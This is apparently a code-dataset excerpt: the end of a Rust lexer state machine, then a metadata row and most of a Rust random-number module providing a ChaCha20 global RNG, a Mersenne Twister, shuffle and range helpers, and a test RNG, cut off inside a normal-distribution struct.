}
impl State {
/// transitions to the next state, given a character
pub fn next(self, c: char) -> Result<Option<Self>, Error> {
use self::State::*;
match self {
Start =>
match c {
'0' => Ok(Some(Zero)),
'(' => Ok(Some(LParen)),
')' => Ok(Some(RParen)),
'{' => Ok(Some(LBrace)),
'}' => Ok(Some(RBrace)),
'[' => Ok(Some(LBrack)),
']' => Ok(Some(RBrack)),
'+' => Ok(Some(Plus)),
'-' => Ok(Some(Minus)),
'*' => Ok(Some(Star)),
'/' => Ok(Some(Slash)),
'%' => Ok(Some(Percent)),
'=' => Ok(Some(Equal)),
'|' => Ok(Some(Bar)),
'&' => Ok(Some(And)),
'^' => Ok(Some(Xor)),
'~' => Ok(Some(Tilde)),
'<' => Ok(Some(Less)),
'>' => Ok(Some(More)),
'!' => Ok(Some(Bang)),
'#' => Ok(Some(Hash)),
'@' => Ok(Some(At)),
'.' => Ok(Some(Dot)),
',' => Ok(Some(Comma)),
'\n' => Ok(Some(EOL)),
'\'' => Ok(Some(CharStart)),
'"' => Ok(Some(StrStart)),
';' => Ok(Some(Semi)),
'_' => Ok(Some(Underscore)),
'?' => Ok(Some(Question)),
':' => Ok(Some(Colon)),
c if c.is_whitespace() => Ok(Some(Start)),
c if c.is_digit(10) => Ok(Some(Dec)),
c if c.is_alphabetic() => Ok(Some(Identifier)),
_ => Err(Error::InvalidCharacter),
}
// numbers
// 0
Zero =>
match c {
'x' => Ok(Some(ZeroX)),
'b' => Ok(Some(ZeroB)),
'_' => Ok(Some(Dec)),
'.' => Ok(Some(DecFloat)),
'e' => Ok(Some(DecE)),
c if c.is_digit(10) => Ok(Some(Dec)),
c if !c.is_alphanumeric() => Ok(None),
_ => Err(Error::MalformedNumericLiteral),
}
// 0x
ZeroX =>
match c {
'_' => Ok(Some(ZeroX)),
c if c.is_digit(16) => Ok(Some(Hex)),
_ => Err(Error::MalformedNumericLiteral),
}
// 0x1
Hex =>
match c {
'_' => Ok(Some(Hex)),
c if c.is_digit(16) => Ok(Some(Hex)),
c if !c.is_alphanumeric() => Ok(None),
_ => Err(Error::MalformedNumericLiteral),
}
// 0b
ZeroB =>
match c {
'_' => Ok(Some(ZeroB)),
c if c.is_digit(2) => Ok(Some(Bin)),
_ => Err(Error::MalformedNumericLiteral),
}
// 0b1
Bin =>
match c {
'_' => Ok(Some(Bin)),
c if c.is_digit(2) => Ok(Some(Bin)),
c if !c.is_alphanumeric() => Ok(None),
_ => Err(Error::MalformedNumericLiteral)
}
// 1
Dec =>
match c {
'_' => Ok(Some(Dec)),
'.' => Ok(Some(DecFloat)),
'e' => Ok(Some(DecE)),
c if c.is_digit(10) => Ok(Some(Dec)),
c if !c.is_alphanumeric() => Ok(None),
_ => Err(Error::MalformedNumericLiteral)
}
// 1.
DecFloat =>
match c {
'_' => Ok(Some(DecFloat)),
'e' => Ok(Some(DecE)),
c if c.is_digit(10) => Ok(Some(DecFloat)),
c if !c.is_alphanumeric() => Ok(None),
_ => Err(Error::MalformedNumericLiteral),
}
// 1.3e
DecE =>
match c {
'-' => Ok(Some(DecEMinus)),
c if c.is_digit(10) => Ok(Some(DecExp)),
_ => Err(Error::MalformedNumericLiteral),
}
// 1.3e-
DecEMinus =>
match c {
c if c.is_digit(10) => Ok(Some(DecExp)),
_ => Err(Error::MalformedNumericLiteral),
}
// 1.3e-5
DecExp =>
match c {
'_' => Ok(Some(DecExp)),
c if c.is_digit(10) => Ok(Some(DecExp)),
c if !c.is_alphanumeric() => Ok(None),
_ => Err(Error::MalformedNumericLiteral),
}
// operators
// /
Slash =>
match c {
'/' => Ok(Some(SlashSlash)),
'=' => Ok(Some(SlashEqual)),
'*' => Ok(Some(SlashStar(1))),
_ => Ok(None),
}
// comments
// //
SlashSlash =>
match c {
'/' => Ok(Some(SlashSlashSlash)),
'\n' => Ok(None),
_ => Ok(Some(LineComment)),
}
// ///
SlashSlashSlash =>
match c {
'\n' => Ok(None),
_ => Ok(Some(DocComment)),
}
// //a
LineComment =>
match c {
'\n' => Ok(None),
_ => Ok(Some(LineComment)),
}
// ///a
DocComment =>
match c {
'\n' => Ok(None),
_ => Ok(Some(DocComment)),
}
// /*
SlashStar(depth) =>
if depth == 0 {
Ok(None)
} else {
match c {
'/' => Ok(Some(SlashStarSlash(depth))),
'*' => Ok(Some(SlashStarStar(depth))),
_ => Ok(Some(SlashStar(depth))),
}
}
// /* *
SlashStarStar(depth) =>
match c {
'/' => Ok(Some(SlashStar(depth - 1))),
'*' => Ok(Some(SlashStarStar(depth))),
_ => Ok(Some(SlashStar(depth))),
}
// /* *
SlashStarSlash(depth) =>
match c {
'/' => Ok(Some(SlashStarSlash(depth))),
'*' =>
if depth == ::std::u8::MAX {
Err(Error::CommentNestingDepth)
} else {
Ok(Some(SlashStar(depth + 1)))
}
_ => Ok(Some(SlashStar(depth))),
}
// '
CharStart =>
match c {
'\\' => Ok(Some(CharSlash)),
'\'' => Err(Error::UnexpectedCharacter),
_ => Ok(Some(CharX)),
}
// 'a
CharX =>
match c {
'\'' => Ok(Some(Char)),
_ => Err(Error::UnexpectedCharacter),
}
// '\
CharSlash => Ok(Some(CharX)),
// 'a'
Char => Ok(None),
// "
StrStart =>
match c {
'"' => Ok(Some(Str)),
'\\' => Ok(Some(StrSlash)),
_ => Ok(Some(StrStart)),
}
// "xx\
StrSlash => Ok(Some(StrStart)),
// "xxx"
Str => Ok(None),
// +
Plus =>
match c {
'+' => Ok(Some(PlusPlus)),
'=' => Ok(Some(PlusEqual)),
_ => Ok(None),
}
// ++
PlusPlus => Ok(None),
// +=
PlusEqual => Ok(None),
// -
Minus =>
match c {
'-' => Ok(Some(MinusMinus)),
'=' => Ok(Some(MinusEqual)),
_ => Ok(None),
}
// --
MinusMinus => Ok(None),
// -=
MinusEqual => Ok(None),
// *
Star =>
match c {
'*' => Ok(Some(StarStar)),
'=' => Ok(Some(StarEqual)),
_ => Ok(None),
},
// **
StarStar =>
match c {
'=' => Ok(Some(StarStarEqual)),
_ => Ok(None),
},
// *=
StarEqual => Ok(None),
StarStarEqual => Ok(None),
// /=
SlashEqual => Ok(None),
// %
Percent =>
match c {
'=' => Ok(Some(PercentEqual)),
_ => Ok(None),
}
// %=
PercentEqual => Ok(None),
// |
Bar =>
match c {
'|' => Ok(Some(BarBar)),
'=' => Ok(Some(BarEqual)),
'>' => Ok(Some(BarMore)),
_ => Ok(None),
}
// ||
BarBar => Ok(None),
// |=
BarEqual => Ok(None),
// &
And =>
match c {
'&' => Ok(Some(AndAnd)),
'=' => Ok(Some(AndEqual)),
_ => Ok(None),
}
// &&
AndAnd => Ok(None),
// &=
AndEqual => Ok(None),
// ^
Xor =>
match c {
'=' => Ok(Some(XorEqual)),
_ => Ok(None),
}
// ^=
XorEqual => Ok(None),
// ~
Tilde => Ok(None),
// !
Bang =>
match c {
'=' => Ok(Some(NotEqual)),
_ => Ok(None),
}
// !=
NotEqual => Ok(None),
// =
Equal =>
match c {
'=' => Ok(Some(EqualEqual)),
_ => Ok(None),
}
// ==
EqualEqual => Ok(None),
// <
Less =>
match c {
'<' => Ok(Some(LShift)),
'=' => Ok(Some(LessEqual)),
_ => Ok(None),
}
// <<
LShift =>
match c {
'=' => Ok(Some(LShiftEqual)),
_ => Ok(None),
}
// <<=
LShiftEqual => Ok(None),
// <=
LessEqual => Ok(None),
// >
More =>
match c {
'>' => Ok(Some(RShift)),
'=' => Ok(Some(MoreEqual)),
_ => Ok(None),
}
// >>
RShift =>
match c {
'=' => Ok(Some(RShiftEqual)),
_ => Ok(None),
},
// >>=
RShiftEqual => Ok(None),
// >=
MoreEqual => Ok(None),
Question => Ok(None),
Colon => Ok(None),
Hash =>
match c {
'm' => Ok(Some(HashM)),
'p' => Ok(Some(HashP)),
_ => Ok(None),
},
At => Ok(None),
Underscore =>
match c {
c if c.is_alphanumeric() => Ok(Some(Identifier)),
_ => Ok(None),
}
BarMore => Ok(None),
Dot =>
match c {
'.' => Ok(Some(DotDot)),
c if c.is_numeric() => Ok(Some(DecFloat)),
_ => Ok(None),
}
DotDot =>
match c {
'.' => Ok(Some(DotDotDot)),
_ => Err(Error::UnexpectedCharacter),
}
DotDotDot =>
match c {
'.' => Err(Error::UnexpectedCharacter),
_ => Ok(None),
}
Comma => Ok(None),
Semi => Ok(None),
// preprocessor
HashM => if c == 'a' { Ok(Some(HashMa)) } else { Err(Error::InvalidPreprocessorDirective) }
HashMa => if c == 'c' { Ok(Some(HashMac)) } else { Err(Error::InvalidPreprocessorDirective) },
HashMac => if c == 'r' { Ok(Some(HashMacr)) } else { Err(Error::InvalidPreprocessorDirective) },
HashMacr => if c == 'o' { Ok(Some(HashMacro)) } else { Err(Error::InvalidPreprocessorDirective) },
HashMacro =>
match c {
'_' => Err(Error::InvalidPreprocessorDirective),
c if c.is_alphanumeric() => Err(Error::InvalidPreprocessorDirective),
_ => Ok(None),
}
HashP => if c == 'r' { Ok(Some(HashPr)) } else { Err(Error::InvalidPreprocessorDirective) },
HashPr => if c == 'a' { Ok(Some(HashPra)) } else { Err(Error::InvalidPreprocessorDirective) },
HashPra => if c == 'g' { Ok(Some(HashPrag)) } else { Err(Error::InvalidPreprocessorDirective) },
HashPrag => if c == 'm' { Ok(Some(HashPragm)) } else { Err(Error::InvalidPreprocessorDirective) },
HashPragm => if c == 'a' { Ok(Some(HashPragma)) } else { Err(Error::InvalidPreprocessorDirective) },
HashPragma =>
match c {
'_' => Err(Error::InvalidPreprocessorDirective),
c if c.is_alphanumeric() => Err(Error::InvalidPreprocessorDirective),
_ => Ok(None),
},
// whitespace
EOL => if c.is_whitespace() { Ok(Some(EOL)) } else { Ok(None) },
// brackets
LParen => Ok(None),
RParen => Ok(None),
LBrack => Ok(None),
RBrack => Ok(None),
LBrace => Ok(None),
RBrace => Ok(None),
Identifier =>
match c {
'_' => Ok(Some(Identifier)),
c if c.is_alphanumeric() => Ok(Some(Identifier)),
_ => Ok(None),
},
}
}
}
| true |
3e0d20701cfdf37b86f18bfa36450dfa45c03b38
|
Rust
|
dennisss/dacha
|
/pkg/crypto/src/random.rs
|
UTF-8
| 19,238 | 2.90625 | 3 |
[
"Apache-2.0"
] |
permissive
|
use alloc::boxed::Box;
use std::f64::consts::PI;
use std::num::Wrapping;
use std::sync::Arc;
use std::vec::Vec;
use common::bytes::{Buf, Bytes};
use common::io::Readable;
use common::{ceil_div, errors::*};
use executor::sync::Mutex;
use file::LocalFile;
use math::big::{BigUint, SecureBigUint};
use math::integer::Integer;
use crate::chacha20::*;
// Amount of output the global RNG may emit before it must be re-keyed from
// the OS entropy pool (see GlobalRng::generate_bytes).
const MAX_BYTES_BEFORE_RESEED: usize = 1024 * 1024 * 1024; // 1GB

lazy_static! {
    // Process-wide RNG state backing global_rng(); constructed on first use.
    static ref GLOBAL_RNG_STATE: GlobalRng = GlobalRng::new();
}
/// Returns a handle to the lazily initialized, process-wide random number
/// generator.
///
/// It is seeded from the OS on first generation. The implementation can be
/// assumed to be secure for cryptographic purposes but may not be very fast.
///
/// TODO: We should disallow re-seeding this RNG.
pub fn global_rng() -> GlobalRng {
    Clone::clone(&*GLOBAL_RNG_STATE)
}
/// Returns a cheap but NON-cryptographic RNG seeded from the sub-second part
/// of the current system time.
pub fn clocked_rng() -> MersenneTwisterRng {
    let nanos = std::time::SystemTime::now()
        .duration_since(std::time::UNIX_EPOCH)
        .unwrap()
        .subsec_nanos();

    let mut rng = MersenneTwisterRng::mt19937();
    rng.seed_u32(nanos);
    rng
}
/// Fills `buf` entirely with random bytes suitable for cryptographic key
/// generation. This may block until sufficient entropy has accumulated in the
/// system.
pub async fn secure_random_bytes(buf: &mut [u8]) -> Result<()> {
    // See http://man7.org/linux/man-pages/man7/random.7.html
    // TODO: Reuse the file handle across calls.
    let mut entropy = LocalFile::open("/dev/random")?;
    entropy.read_exact(buf).await?;
    Ok(())
}
/// Securely generates a random value in the range '[lower, upper)'.
///
/// Uses rejection sampling over candidates of `upper.value_bits()` bits so
/// that every integer in the range has the same probability of being output.
///
/// NOTE: Both the 'lower' and 'upper' numbers should be publicly known for this
/// to be secure.
///
/// The output integer will have the same width as the 'upper' integer.
pub async fn secure_random_range(
    lower: &SecureBigUint,
    upper: &SecureBigUint,
) -> Result<SecureBigUint> {
    if upper.byte_width() == 0 || upper <= lower {
        return Err(err_msg("Invalid upper/lower range"));
    }

    let mut buf = vec![];
    buf.resize(upper.byte_width(), 0);

    // Number of random bytes needed to cover all value bits of 'upper'.
    let num_bytes = ceil_div(upper.value_bits(), 8);

    // Mask for the most significant (little-endian) byte: keep only the low
    // 'r' bits so every candidate is < 2^value_bits.
    //
    // BUGFIX: this used to be `!((1 << (8 - r)) - 1)`, which keeps the HIGH
    // bits of the top byte and zeroes the low ones — that both biases the
    // output (some in-range values become unreachable) and shrinks the
    // acceptance rate of the rejection loop.
    let msb_mask: u8 = {
        let r = upper.value_bits() % 8;
        if r == 0 {
            0xff
        } else {
            (1u8 << r) - 1
        }
    };

    // Rejection sampling: each masked candidate lands in [lower, upper) with
    // probability > 1/2 (when lower is small), so this terminates quickly
    // with overwhelming probability.
    loop {
        secure_random_bytes(&mut buf[0..num_bytes]).await?;
        buf[num_bytes - 1] &= msb_mask;

        let n = SecureBigUint::from_le_bytes(&buf);

        // TODO: This *must* be a secure comparison (which it isn't right now).
        if &n >= lower && &n < upper {
            return Ok(n);
        }
    }
}
/// Synchronous random number source.
pub trait Rng {
    /// Number of seed bytes expected by seed().
    fn seed_size(&self) -> usize;

    /// Resets the generator's state from the given seed bytes.
    fn seed(&mut self, new_seed: &[u8]);

    /// Fills `output` entirely with random bytes.
    fn generate_bytes(&mut self, output: &mut [u8]);
}

#[async_trait]
pub trait SharedRng: 'static + Send + Sync {
    /// Number of bytes used to seed this RNG.
    fn seed_size(&self) -> usize;

    /// Should reset the state of the RNG based on the provided seed.
    /// Calling generate_bytes after calling reseed with the same seed should
    /// always produce the same result.
    async fn seed(&self, new_seed: &[u8]);

    async fn generate_bytes(&self, output: &mut [u8]);
}

/// Cheaply clonable handle to the process-wide RNG (see global_rng()).
#[derive(Clone)]
pub struct GlobalRng {
    state: Arc<GlobalRngState>,
}

struct GlobalRngState {
    // Bytes emitted since the last reseed. Starts at usize::MAX so the very
    // first generate_bytes() call always triggers a reseed from the OS.
    bytes_since_reseed: Mutex<usize>,
    rng: ChaCha20RNG,
}
impl GlobalRng {
    /// Creates an unseeded instance. The saturated byte counter guarantees
    /// the first generate_bytes() call seeds it from the OS.
    fn new() -> Self {
        let state = GlobalRngState {
            bytes_since_reseed: Mutex::new(std::usize::MAX),
            rng: ChaCha20RNG::new(),
        };

        Self {
            state: Arc::new(state),
        }
    }
}
#[async_trait]
impl SharedRng for GlobalRng {
    fn seed_size(&self) -> usize {
        0
    }

    /// # Panics
    /// Always; the global RNG manages its own seeding.
    async fn seed(&self, _new_seed: &[u8]) {
        // Global RNG can't be manually reseeding
        panic!();
    }

    async fn generate_bytes(&self, output: &mut [u8]) {
        {
            let mut counter = self.state.bytes_since_reseed.lock().await;
            // Re-key from /dev/random on first use and again after every
            // MAX_BYTES_BEFORE_RESEED bytes of output.
            if *counter > MAX_BYTES_BEFORE_RESEED {
                let mut new_seed = vec![0u8; self.state.rng.seed_size()];
                secure_random_bytes(&mut new_seed).await.unwrap();

                self.state.rng.seed(&new_seed).await;
                *counter = 0;
            }

            // NOTE: For now we ignore the case of a user requesting a quantity that
            // partially exceeds our max threshold.
            *counter += output.len();
        }

        // Lock released above: the inner RNG synchronizes internally.
        self.state.rng.generate_bytes(output).await
    }
}
// Adapts any synchronous Rng wrapped in an async Mutex to the SharedRng
// interface.
#[async_trait]
impl<R: Rng + Send + ?Sized + 'static> SharedRng for Mutex<R> {
    // Unimplemented: the trait method is sync, but querying the inner Rng
    // requires acquiring the async lock.
    fn seed_size(&self) -> usize {
        todo!()
        // self.lock().await.seed_size()
    }

    async fn seed(&self, new_seed: &[u8]) {
        self.lock().await.seed(new_seed)
    }

    async fn generate_bytes(&self, output: &mut [u8]) {
        self.lock().await.generate_bytes(output)
    }
}
/// Sample random number generator based on ChaCha20
///
/// - During initialization and periodically afterwards, we (re-)generate the
///   256-bit key from a 'true random' source (/dev/random).
/// - When a key is selected, we reset the nonce to 0.
/// - The nonce is incremented by 1 for each block we encrypt.
/// - The plaintext to be encrypted is the system time at key creation in
///   nanoseconds.
/// - All of the above are re-seeding in the background every 30 seconds.
/// - Random bytes are generated by encrypting the plaintext with the current
///   nonce and key.
pub struct ChaCha20RNG {
    state: Mutex<ChaCha20RNGState>,
}

#[derive(Clone)]
struct ChaCha20RNGState {
    // Current cipher key; replaced on every seed().
    key: [u8; CHACHA20_KEY_SIZE],
    // Per-call counter; each generate_bytes() consumes one nonce value.
    nonce: u64,
    // Constant block that is encrypted to produce the output stream.
    plaintext: [u8; CHACHA20_BLOCK_SIZE],
}

impl ChaCha20RNG {
    /// Creates a new instance of the rng with a fixed 'zero' seed.
    pub fn new() -> Self {
        Self {
            state: Mutex::new(ChaCha20RNGState {
                key: [0u8; CHACHA20_KEY_SIZE],
                nonce: 0,
                plaintext: [0u8; CHACHA20_BLOCK_SIZE],
            }),
        }
    }
}
#[async_trait]
impl SharedRng for ChaCha20RNG {
    fn seed_size(&self) -> usize {
        CHACHA20_KEY_SIZE + CHACHA20_BLOCK_SIZE
    }

    /// Installs a new key/plaintext pair and resets the nonce counter.
    async fn seed(&self, new_seed: &[u8]) {
        let mut state = self.state.lock().await;
        state.nonce = 0;
        state.key.copy_from_slice(&new_seed[0..CHACHA20_KEY_SIZE]);
        state
            .plaintext
            .copy_from_slice(&new_seed[CHACHA20_KEY_SIZE..]);
    }

    async fn generate_bytes(&self, mut output: &mut [u8]) {
        // Snapshot the state and bump the nonce under the lock so concurrent
        // callers never reuse a (key, nonce) pair.
        let state = {
            let mut guard = self.state.lock().await;
            let cur_state = guard.clone();
            guard.nonce += 1;
            cur_state
        };

        let mut nonce = [0u8; CHACHA20_NONCE_SIZE];
        // BUGFIX: use a fixed little-endian encoding (was to_ne_bytes). The
        // SharedRng contract requires identical output for identical seeds,
        // which native-endian encoding would break across platforms.
        nonce[0..8].copy_from_slice(&state.nonce.to_le_bytes());

        let mut chacha = ChaCha20::new(&state.key, &nonce);

        // Emit one encrypted block at a time; the final block is truncated
        // to the remaining output length.
        while !output.is_empty() {
            let mut output_block = [0u8; CHACHA20_BLOCK_SIZE];
            chacha.encrypt(&state.plaintext, &mut output_block);

            let n = std::cmp::min(output_block.len(), output.len());
            output[0..n].copy_from_slice(&output_block[0..n]);
            output = &mut output[n..];
        }
    }
}
/// Convenience sampling helpers layered on top of SharedRng.
#[async_trait]
pub trait SharedRngExt {
    async fn shuffle<T: Send + Sync>(&self, elements: &mut [T]);
    async fn uniform<T: RngNumber>(&self) -> T;
    async fn between<T: RngNumber>(&self, min: T, max: T) -> T;
}

// Forwarding impl so the helpers are callable directly on an Arc<R>.
#[async_trait]
impl<R: SharedRng + ?Sized> SharedRngExt for Arc<R> {
    async fn shuffle<T: Send + Sync>(&self, elements: &mut [T]) {
        self.as_ref().shuffle(elements).await
    }

    async fn uniform<T: RngNumber>(&self) -> T {
        self.as_ref().uniform().await
    }

    async fn between<T: RngNumber>(&self, min: T, max: T) -> T {
        self.as_ref().between(min, max).await
    }
}
#[async_trait]
impl<R: SharedRng + ?Sized> SharedRngExt for R {
    /// Uniformly shuffles `elements` in place using Fisher-Yates.
    ///
    /// Element i is swapped with a uniformly chosen index in [0, i].
    /// (BUGFIX: the previous version paired every index with a position drawn
    /// over the whole slice — the classic "naive shuffle" — which produces a
    /// non-uniform distribution over permutations.)
    async fn shuffle<T: Send + Sync>(&self, elements: &mut [T]) {
        for i in (1..elements.len()).rev() {
            // NOTE: The modulo retains a negligible bias when (i + 1) does
            // not evenly divide 2^64.
            let j = self.uniform::<usize>().await % (i + 1);
            elements.swap(i, j);
        }
    }

    /// Returns a value sampled uniformly over the entire domain of T.
    async fn uniform<T: RngNumber>(&self) -> T {
        let mut buf = T::Buffer::default();
        self.generate_bytes(buf.as_mut()).await;
        T::uniform_buffer(buf)
    }

    /// Returns a value in the range [min, max).
    async fn between<T: RngNumber>(&self, min: T, max: T) -> T {
        let mut buf = T::Buffer::default();
        self.generate_bytes(buf.as_mut()).await;
        T::between_buffer(buf, min, max)
    }
}
/// A primitive number that can be derived from a fixed-size random byte
/// buffer (see RngExt / SharedRngExt).
pub trait RngNumber: Send + Sync + 'static {
    /// Raw entropy buffer: exactly size_of::<Self>() bytes.
    type Buffer: Send + Sync + Sized + Default + AsMut<[u8]>;

    /// Reinterprets the buffer as a value uniform over the whole domain.
    fn uniform_buffer(random: Self::Buffer) -> Self;

    /// Reduces the buffer to a value in [min, max) (min when the range is
    /// empty).
    fn between_buffer(random: Self::Buffer, min: Self, max: Self) -> Self;
}

// NOTE: The old `ensure_positive!` helper macro was removed: it negated
// negative values with `$value * -1`, which overflows (panics in debug
// builds) for <int>::MIN. `rem_euclid` below handles negatives safely.

macro_rules! impl_rng_number_integer {
    ($num:ident) => {
        impl RngNumber for $num {
            type Buffer = [u8; std::mem::size_of::<$num>()];

            fn uniform_buffer(random: Self::Buffer) -> Self {
                Self::from_le_bytes(random)
            }

            fn between_buffer(random: Self::Buffer, min: Self, max: Self) -> Self {
                assert!(max >= min);
                // An empty range can only yield 'min'. This also avoids a
                // division by zero in the modulo below (the old code paniced
                // on max == min).
                if max == min {
                    return min;
                }

                let num = Self::uniform_buffer(random);

                // rem_euclid maps any value — including negatives and
                // <int>::MIN — into [0, range) without overflow.
                // NOTE: 'max' - 'min' must not overflow the type (for signed
                // types the range must fit in N-1 bits).
                let range = max - min;
                num.rem_euclid(range) + min
            }
        }
    };
}

impl_rng_number_integer!(u8);
impl_rng_number_integer!(i8);
impl_rng_number_integer!(u16);
impl_rng_number_integer!(i16);
impl_rng_number_integer!(u32);
impl_rng_number_integer!(i32);
impl_rng_number_integer!(u64);
impl_rng_number_integer!(i64);
impl_rng_number_integer!(usize);
impl_rng_number_integer!(isize);
macro_rules! impl_rng_number_float {
    // $fraction_bits: mantissa width of the IEEE-754 format.
    // $zero_exponent: biased exponent value that encodes 2^0.
    ($float_type:ident, $int_type:ident, $fraction_bits:expr, $zero_exponent:expr) => {
        impl RngNumber for $float_type {
            type Buffer = [u8; std::mem::size_of::<$float_type>()];

            // Reinterprets the raw bytes as a float; the result may be any
            // bit pattern including inf/NaN.
            fn uniform_buffer(random: Self::Buffer) -> Self {
                Self::from_le_bytes(random)
            }

            // Builds a float of the form (1 + fraction) * 2^0 in [1, 2) from
            // the random mantissa bits, then shifts/scales it into [min, max).
            fn between_buffer(mut random: Self::Buffer, min: Self, max: Self) -> Self {
                assert!(max >= min);

                let mut num = $int_type::from_le_bytes(random);

                // Clear the sign and exponent bits.
                num &= (1 << $fraction_bits) - 1;

                // Set the exponent to '0'. So the number will be (1 + fraction) * 2^0
                num |= $zero_exponent << $fraction_bits;

                random = num.to_le_bytes();

                // This will in the range [0, 1).
                let f = Self::from_le_bytes(random) - 1.0;

                // Convert to [min, max).
                let range = max - min;
                f * range + min
            }
        }
    };
}

impl_rng_number_float!(f32, u32, 23, 127);
impl_rng_number_float!(f64, u64, 52, 1023);
/// Convenience sampling helpers layered on top of the synchronous Rng.
pub trait RngExt {
    fn shuffle<T>(&mut self, elements: &mut [T]);
    fn uniform<T: RngNumber>(&mut self) -> T;
    fn between<T: RngNumber>(&mut self, min: T, max: T) -> T;
    fn choose<'a, T>(&mut self, elements: &'a [T]) -> &'a T;
}
impl<R: Rng + ?Sized> RngExt for R {
    /// Uniformly shuffles `elements` in place using Fisher-Yates.
    ///
    /// Element i is swapped with a uniformly chosen index in [0, i].
    /// (BUGFIX: the previous version paired every index with a position drawn
    /// over the whole slice — the classic "naive shuffle" — which produces a
    /// non-uniform distribution over permutations.)
    fn shuffle<T>(&mut self, elements: &mut [T]) {
        for i in (1..elements.len()).rev() {
            // NOTE: The modulo retains a negligible bias when (i + 1) does
            // not evenly divide 2^64.
            let j = self.uniform::<usize>() % (i + 1);
            elements.swap(i, j);
        }
    }

    /// Returns a completely random number anywhere in the range of the number
    /// type. Every number is equally probably of occuring.
    fn uniform<T: RngNumber>(&mut self) -> T {
        let mut buf = T::Buffer::default();
        self.generate_bytes(buf.as_mut());
        T::uniform_buffer(buf)
    }

    /// Returns a uniform random number in the range [min, max).
    ///
    /// Limitations:
    /// - 'max' must be >= 'min'.
    /// - For signed integer types for N bits, 'max' - 'min' must fit in N-1
    ///   bits.
    fn between<T: RngNumber>(&mut self, min: T, max: T) -> T {
        let mut buf = T::Buffer::default();
        self.generate_bytes(buf.as_mut());
        T::between_buffer(buf, min, max)
    }

    /// Returns a uniformly chosen element of `elements`.
    ///
    /// # Panics
    /// If `elements` is empty.
    fn choose<'a, T>(&mut self, elements: &'a [T]) -> &'a T {
        assert!(!elements.is_empty(), "Choosing from empty list");
        let n = self.uniform::<usize>();
        &elements[n % elements.len()]
    }
}
/// Seed applied by next_u32() when the generator was never explicitly seeded.
pub const MT_DEFAULT_SEED: u32 = 5489;

/// Parameterized Mersenne Twister generator (see mt19937() for the standard
/// 32-bit parameter set). NOT cryptographically secure.
pub struct MersenneTwisterRng {
    w: u32,   // word size in bits
    n: usize, // state vector length (degree of recurrence)
    m: usize, // middle offset used by twist()
    r: u32,   // separation point of one word (lower bitmask width)
    a: u32,   // coefficients of the twist matrix
    b: u32,   // tempering bitmask
    c: u32,   // tempering bitmask
    s: u32,   // tempering shift
    t: u32,   // tempering shift
    u: u32,   // tempering shift
    d: u32,   // tempering bitmask
    l: u32,   // tempering shift
    f: u32,   // seeding multiplier

    x: Vec<u32>,  // state vector (empty until seeded)
    index: usize, // next state word to temper and output
}
impl MersenneTwisterRng {
    // TODO: Add a simple time seeded implementation.

    /// Standard 32-bit MT19937 parameter set.
    pub fn mt19937() -> Self {
        Self {
            w: 32,
            n: 624,
            m: 397,
            r: 31,
            a: 0x9908B0DF,
            u: 11,
            d: 0xffffffff,
            s: 7,
            b: 0x9D2C5680,
            t: 15,
            c: 0xEFC60000,
            l: 18,
            f: 1812433253,
            x: vec![],
            index: 0,
        }
    }

    /// (Re-)initializes the full state vector from a 32-bit seed.
    pub fn seed_u32(&mut self, seed: u32) {
        self.x.resize(self.n, 0);
        // index == n forces a twist() before the first output.
        self.index = self.n;
        self.x[0] = seed;
        for i in 1..self.n {
            self.x[i] = (self.x[i - 1] ^ (self.x[i - 1] >> (self.w - 2)))
                .wrapping_mul(self.f)
                .wrapping_add(i as u32);
        }
    }

    /// Returns the next tempered 32-bit output. Seeds with MT_DEFAULT_SEED
    /// on first use if never explicitly seeded.
    pub fn next_u32(&mut self) -> u32 {
        if self.x.is_empty() {
            self.seed_u32(MT_DEFAULT_SEED);
        }

        // Regenerate the state once all n words have been consumed.
        if self.index >= self.n {
            self.twist();
        }

        // Tempering transform.
        let mut y = self.x[self.index];
        y ^= (y >> self.u) & self.d;
        y ^= (y << self.s) & self.b;
        y ^= (y << self.t) & self.c;
        y ^= y >> self.l;
        self.index += 1;
        y
    }

    // Advances the recurrence, regenerating the whole state vector.
    fn twist(&mut self) {
        // checked_shl handles w == 32, where a plain shift would overflow.
        let w_mask = 1u32.checked_shl(self.w).unwrap_or(0).wrapping_sub(1);
        let upper_mask = (w_mask << self.r) & w_mask;
        let lower_mask = (!upper_mask) & w_mask;

        self.index = 0;
        for i in 0..self.n {
            let x = (self.x[i] & upper_mask) | (self.x[(i + 1) % self.x.len()] & lower_mask);
            let mut x_a = x >> 1;
            if x & 1 != 0 {
                x_a = x_a ^ self.a;
            }

            self.x[i] = self.x[(i + self.m) % self.x.len()] ^ x_a;
        }
    }
}
impl Rng for MersenneTwisterRng {
    fn seed_size(&self) -> usize {
        std::mem::size_of::<u32>()
    }

    /// # Panics
    /// If `new_seed` is not exactly 4 bytes (interpreted little-endian).
    fn seed(&mut self, new_seed: &[u8]) {
        assert_eq!(new_seed.len(), std::mem::size_of::<u32>());
        let seed_num = u32::from_le_bytes(*array_ref![new_seed, 0, 4]);
        self.seed_u32(seed_num);
    }

    fn generate_bytes(&mut self, output: &mut [u8]) {
        // NOTE: All of the 4's in here are std::mem::size_of::<u32>()
        let n = output.len() / 4;
        let r = output.len() % 4;
        // Fill whole 4-byte words first (little-endian).
        for i in 0..n {
            *array_mut_ref![output, 4 * i, 4] = self.next_u32().to_le_bytes();
        }

        // Tail: take the low bytes of one extra output word.
        if r != 0 {
            let v = self.next_u32().to_le_bytes();
            let i = output.len() - r;
            output[i..].copy_from_slice(&v[0..r]);
        }
    }
}
/// "Rng" that replays a fixed byte sequence; intended for deterministic
/// tests, not for production randomness.
pub struct FixedBytesRng {
    data: Bytes,
}

impl FixedBytesRng {
    pub fn new<T: Into<Bytes>>(data: T) -> Self {
        Self { data: data.into() }
    }
}

impl Rng for FixedBytesRng {
    /// # Panics
    /// Always; a fixed sequence has no meaningful seed.
    fn seed_size(&self) -> usize {
        panic!();
    }

    /// # Panics
    /// Always; a fixed sequence cannot be reseeded.
    fn seed(&mut self, _new_seed: &[u8]) {
        panic!();
    }

    /// Copies the next `output.len()` bytes of the fixed sequence.
    ///
    /// # Panics
    /// If fewer than `output.len()` bytes remain.
    fn generate_bytes(&mut self, output: &mut [u8]) {
        if output.len() > self.data.len() {
            panic!();
        }

        output.copy_from_slice(&self.data[0..output.len()]);
        self.data.advance(output.len());
    }
}
/// Normal (Gaussian) sampler state based on the Box-Muller transform.
pub struct NormalDistribution {
    // NOTE(review): mean/stddev are stored but not applied by the `next`
    // impl below, which returns standard-normal samples — confirm whether
    // scaling was intended.
    mean: f64,
    stddev: f64,
    // Second value of the last Box-Muller pair, buffered for the next call.
    next_number: Option<f64>,
